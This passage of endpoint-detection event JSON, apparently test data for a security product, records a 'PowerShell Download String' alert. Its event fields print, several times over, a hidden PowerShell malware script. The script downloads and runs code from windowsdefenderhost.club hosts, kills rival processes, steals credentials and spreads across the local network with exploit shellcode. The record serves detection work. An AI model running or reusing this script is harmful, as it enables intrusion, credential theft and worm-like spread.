         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download 
String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
